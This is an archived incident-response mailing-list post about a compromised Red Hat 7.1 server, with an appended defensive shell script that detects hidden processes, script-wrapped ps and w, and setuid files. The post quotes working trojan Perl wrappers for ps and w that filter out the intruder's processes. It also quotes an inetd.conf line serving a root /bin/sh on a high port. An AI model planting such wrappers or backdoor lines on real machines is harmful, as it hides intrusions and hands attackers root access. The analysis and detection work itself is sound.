Hi,

I found today something funny happening when I tried to install a web server on a customer's machine:

1. w - returned some weird "/usr/bin/perl" processes
2. ps - was not showing everything
3. two connections to some irc servers; fuser - finding the process IDs for them, but ps not showing them

Some info about the server (unfortunately it wasn't installed by me...):

[root@www root]# uname -a
Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
(compiled in the future too, lol)

[root@www /root]# cat /etc/redhat-release
Red Hat Linux release 7.1 (Seawolf)

More digging... so I found some modified files:

[root@www nouser]# ls -l /bin/ps
-rwxr-xr-x    1 nouser   nouser        188 Mar  2 15:45 /bin/ps

[root@www /root]# cat /bin/ps
#!/usr/bin/perl
$xargs =join(' ',@ARGV);
$ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \| grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
print "$ps";

[root@www /root]# ls -l /usr/lib/libxnotps
-r-xr-xr-x    1 root     root        64092 Apr  5  2001 /usr/lib/libxnotps

[root@www nouser]# ls -l /usr/bin/w
-rwxr-xr-x    1 nouser   nouser        105 Jan 20 01:03 /usr/bin/w

[root@www /root]# cat /usr/bin/w
#!/usr/bin/perl
$xargs =join(' ',@ARGV);
$w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
print "$w";

[root@www /root]# ls -l /usr/lib/libxyotps
-r-xr-xr-x    1 root     root         8688 Apr  5  2001 /usr/lib/libxyotps

There is another file called /usr/lib/libxzotps, but I couldn't find what is pointing at that, yet. No reference found on the web, searching for "libxnotps" or "libxyotps" or "libxzotps".

[root@www nouser]# grep nouser /etc/passwd
nouser:x:502:502::/sbin/nouser:/bin/bash

[root@www nouser]# ls -l /sbin/nouser
total 3328
-rw-r--r--    1 nouser   nouser      80092 Mar  2 23:22 broadcast-5000.log
-rw-r--r--    1 nouser   nouser    3057793 Mar  2 23:22 broadcast-full.log
drwxr-xr-x    2 nouser   nouser       4096 Mar  2 13:01 Desktop
drwxrwxr-x    4 nouser   nouser       4096 Mar  5 19:23 iroffer
-rw-rw-r--    1 nouser   nouser     206865 Mar  5 19:23 iroffer.tar.gz
-rwsr-xr-x    1 root     root        13855 Mar  2 13:04 nouser
-rw-rw-r--    1 root     root         2215 Mar  2 23:23 packet0r.pl
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:15 scan-1
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-2
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-3
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:13 war

Of course the suid "nouser" gives a root shell... and the directories are full of war scripts, flood tools, and warez... given away through irc bots.

I have scanned the machine using chkrootkit... the only funny thing found was an inetd.conf, containing:

[root@www nouser]# cat /etc/inetd.conf
65456 stream tcp nowait root /bin/sh sh

Of course, inetd is not installed :)

That points me to the idea that the process was somehow automated... but I can't find any reference to a rootkit that does these changes. Seems pretty stupid for a rootkit anyway... but I want to be sure no other major changes were made... before I install the production server there.

Thanks for any comments

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
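Added example, not part of the post above and not from any rootkit or tool it mentions: a POSIX shell script that does the checks the poster did by hand. The wrappers in the post hide lines with "grep -v", so every hidden process still has a /proc/<pid> directory; the script diffs the kernel's view of the process table against whatever /bin/ps reports, tests whether the process-listing tools are "#!" scripts instead of ELF executables, and lists setuid files such as the root-owned "nouser" binary. The function names, the list of tools checked and the directories scanned are my own choices, and the inputs used to exercise the logic are constructed.

```shell
#!/bin/sh
# Added example (not from the post above): cross-check what a possibly
# trojaned /bin/ps reports against /proc, flag process-listing tools that
# have been replaced by interpreter scripts, and list setuid files.
# Function names are my own; the post's wrapper hides lines containing
# "nouser", "noshell", "proftp", "/bin/ps" and "libxnotps" with grep -v,
# so anything it hides still has a /proc/<pid> directory.

# hidden_pids PROC_LIST PS_LIST
# Print every PID in PROC_LIST (space separated) that is not in PS_LIST.
# Taking both lists as arguments keeps the logic testable on constructed data.
hidden_pids() {
    for p in $1; do
        found=0
        for q in $2; do
            if [ "$p" = "$q" ]; then found=1; break; fi
        done
        if [ "$found" -eq 0 ]; then printf '%s\n' "$p"; fi
    done
    return 0
}

# procfs_pids: set PROCFS_PIDS from the kernel's own view, i.e. the
# numeric directories under /proc. Done in the current shell (no $(...))
# so the scan does not add a subshell PID of its own to the list.
procfs_pids() {
    PROCFS_PIDS=''
    for d in /proc/[0-9]*; do
        PROCFS_PIDS="$PROCFS_PIDS ${d#/proc/}"
    done
}

# ps_pids: PIDs as reported by whatever /bin/ps currently is.
ps_pids() {
    ps -e -o pid= | tr -s ' \n' '  '
}

# binary_kind FILE: print "script" if FILE starts with "#!", "elf" if it
# starts with the ELF magic 7f 45 4c 46, otherwise "other". A real ps or w
# is an ELF executable; a "#!" there is the wrapper pattern from the post.
binary_kind() {
    magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        2321*)     echo script ;;
        7f454c46)  echo elf ;;
        *)         echo other ;;
    esac
}

# suid_files DIR...: print regular files with the setuid bit set under DIR.
# Run as root and pipe through ls -l to see the owner; a root-owned setuid
# file in a user's home directory is the "nouser" case from the post.
suid_files() {
    find "$@" -type f -perm -4000 2>/dev/null
}

# audit_live: run all three checks on the current machine.
# ps is sampled first so that only processes started between the two
# samples can show up as false positives.
audit_live() {
    ps_now=$(ps_pids)
    procfs_pids
    echo "== PIDs in /proc but missing from ps output =="
    hidden_pids "$PROCFS_PIDS" "$ps_now"
    echo "== process-listing tools that are scripts instead of ELF =="
    for b in /bin/ps /usr/bin/w /usr/bin/top /usr/bin/who /usr/bin/pstree; do
        if [ -e "$b" ]; then echo "$b: $(binary_kind "$b")"; fi
    done
    echo "== setuid files under /home and /sbin =="
    suid_files /home /sbin
}

# Run the live audit only when invoked as "sh audit.sh run", so the file
# can also be sourced for its functions.
if [ "${1:-}" = run ]; then
    audit_live
fi
```

Run it as root with "sh audit.sh run". A PID that shows up in the first section on two consecutive runs is being hidden by the ps on the box, and "script" next to /bin/ps or /usr/bin/w is the wrapper the post quotes. This only catches userland trojans of this kind: a kernel module that filters /proc itself would fool the first check too, which is why the poster's cross-check with fuser against the IRC connections is still worth doing.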
This archive was generated by hypermail 2b30 : Sun Mar 10 2002 - 17:10:24 PST